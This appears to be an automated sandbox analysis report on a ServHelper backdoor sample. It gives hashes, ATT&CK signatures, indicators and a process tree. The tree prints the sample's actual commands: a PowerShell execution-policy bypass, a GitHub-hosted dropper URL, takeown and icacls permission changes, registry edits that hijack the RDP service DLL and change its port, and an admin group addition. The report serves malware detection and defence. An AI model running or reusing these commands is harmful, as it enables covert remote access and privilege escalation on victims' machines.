servhelper | 2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f

Analysis

max time kernel
121s
max time network
168s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
22-02-2022 11:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe
Size

4.2MB
MD5

470602a8aa144556803374fb94a210aa
SHA1

a04b54e71646fd4f70fec7a24b44932079755f5e
SHA256

2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f
SHA512

24020ea5d03d5b4527d24b7cc531729771e714e180d85fca8b1a8e01211f1e21fb339ffdcd6d04c1df8a1c2414fe281d86039be025ea92c72ffb3325cc1221eb

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
71	3512	powershell.exe
73	3512	powershell.exe
74	3512	powershell.exe
75	3512	powershell.exe
76	3512	powershell.exe
78	3512	powershell.exe
80	3512	powershell.exe
82	3512	powershell.exe
84	3512	powershell.exe
86	3512	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

InstallUtil.exe

pid process

2124 InstallUtil.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

3872 icacls.exe
2744 icacls.exe
4512 takeown.exe
3852 icacls.exe
2232 icacls.exe
432 icacls.exe
1768 icacls.exe
4132 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
2124	InstallUtil.exe

pid	process
3872	icacls.exe
2744	icacls.exe
4512	takeown.exe
3852	icacls.exe
2232	icacls.exe
432	icacls.exe
1768	icacls.exe
4132	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

4288
4288
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

4512 takeown.exe
3852 icacls.exe
2232 icacls.exe
432 icacls.exe
1768 icacls.exe
4132 icacls.exe
3872 icacls.exe
2744 icacls.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
4288
4288

pid	process
4512	takeown.exe
3852	icacls.exe
2232	icacls.exe
432	icacls.exe
1768	icacls.exe
4132	icacls.exe
3872	icacls.exe
2744	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe

description	pid	process	target process
PID 4896 set thread context of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 24 IoCs

Processes:

powershell.exepowershell.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE48C.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE4BC.tmp	powershell.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE50C.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE51D.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_3igexyc4.vmq.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_u5atovjb.tp0.psm1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE4DC.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

5056 reg.exe
Runs net.exe

pid	process
5056	reg.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	75	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	76	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	78	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	73	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	74	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe
4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe
1684	powershell.exe
1684	powershell.exe
3148	powershell.exe
3148	powershell.exe
1856	powershell.exe
1856	powershell.exe
932	powershell.exe
932	powershell.exe
1684	powershell.exe
1684	powershell.exe
1684	powershell.exe
3512	powershell.exe
3512	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

668
668

pid	process
668
668

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exesvchost.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe
Token: SeShutdownPrivilege	4452	svchost.exe
Token: SeCreatePagefilePrivilege	4452	svchost.exe
Token: SeShutdownPrivilege	4452	svchost.exe
Token: SeCreatePagefilePrivilege	4452	svchost.exe
Token: SeShutdownPrivilege	4452	svchost.exe
Token: SeCreatePagefilePrivilege	4452	svchost.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	3148	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeRestorePrivilege	2232	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4856	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4856	WMIC.exe
Token: SeAuditPrivilege	4856	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4856	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4856	WMIC.exe
Token: SeAuditPrivilege	4856	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4872	WMIC.exe
Token: SeAuditPrivilege	4872	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4872	WMIC.exe
Token: SeAuditPrivilege	4872	WMIC.exe
Token: SeDebugPrivilege	3512	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exeInstallUtil.exepowershell.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	InstallUtil.exe
PID 2124 wrote to memory of 1684	2124	InstallUtil.exe	powershell.exe
PID 2124 wrote to memory of 1684	2124	InstallUtil.exe	powershell.exe
PID 1684 wrote to memory of 3148	1684	powershell.exe	powershell.exe
PID 1684 wrote to memory of 3148	1684	powershell.exe	powershell.exe
PID 1684 wrote to memory of 1856	1684	powershell.exe	powershell.exe
PID 1684 wrote to memory of 1856	1684	powershell.exe	powershell.exe
PID 1684 wrote to memory of 932	1684	powershell.exe	powershell.exe
PID 1684 wrote to memory of 932	1684	powershell.exe	powershell.exe
PID 1684 wrote to memory of 4512	1684	powershell.exe	takeown.exe
PID 1684 wrote to memory of 4512	1684	powershell.exe	takeown.exe
PID 1684 wrote to memory of 3852	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 3852	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 2232	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 2232	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 432	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 432	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 1768	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 1768	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 4132	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 4132	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 3872	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 3872	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 2744	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 2744	1684	powershell.exe	icacls.exe
PID 1684 wrote to memory of 4900	1684	powershell.exe	reg.exe
PID 1684 wrote to memory of 4900	1684	powershell.exe	reg.exe
PID 1684 wrote to memory of 5056	1684	powershell.exe	reg.exe
PID 1684 wrote to memory of 5056	1684	powershell.exe	reg.exe
PID 1684 wrote to memory of 460	1684	powershell.exe	reg.exe
PID 1684 wrote to memory of 460	1684	powershell.exe	reg.exe
PID 1684 wrote to memory of 4732	1684	powershell.exe	net.exe
PID 1684 wrote to memory of 4732	1684	powershell.exe	net.exe
PID 4732 wrote to memory of 4968	4732	net.exe	net1.exe
PID 4732 wrote to memory of 4968	4732	net.exe	net1.exe
PID 1684 wrote to memory of 636	1684	powershell.exe	cmd.exe
PID 1684 wrote to memory of 636	1684	powershell.exe	cmd.exe
PID 636 wrote to memory of 3572	636	cmd.exe	cmd.exe
PID 636 wrote to memory of 3572	636	cmd.exe	cmd.exe
PID 3572 wrote to memory of 4572	3572	cmd.exe	net.exe
PID 3572 wrote to memory of 4572	3572	cmd.exe	net.exe
PID 4572 wrote to memory of 2324	4572	net.exe	net1.exe
PID 4572 wrote to memory of 2324	4572	net.exe	net1.exe
PID 1684 wrote to memory of 996	1684	powershell.exe	cmd.exe
PID 1684 wrote to memory of 996	1684	powershell.exe	cmd.exe
PID 996 wrote to memory of 3452	996	cmd.exe	cmd.exe
PID 996 wrote to memory of 3452	996	cmd.exe	cmd.exe
PID 3452 wrote to memory of 1900	3452	cmd.exe	net.exe
PID 3452 wrote to memory of 1900	3452	cmd.exe	net.exe
PID 1900 wrote to memory of 2724	1900	net.exe	net1.exe
PID 1900 wrote to memory of 2724	1900	net.exe	net1.exe
PID 1628 wrote to memory of 3264	1628	cmd.exe	net.exe
PID 1628 wrote to memory of 3264	1628	cmd.exe	net.exe
PID 3264 wrote to memory of 2520	3264	net.exe	net1.exe
PID 3264 wrote to memory of 2520	3264	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe
"C:\Users\Admin\AppData\Local\Temp\2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
  C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:932
  - - C:\Windows\system32\takeown.exe
      "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4512
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3852
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2232
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:432
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1768
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4132
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3872
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2744
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      4⤵
      PID:4900
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      4⤵
      Modifies registry key
      PID:5056
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      4⤵
      PID:460
  - - C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
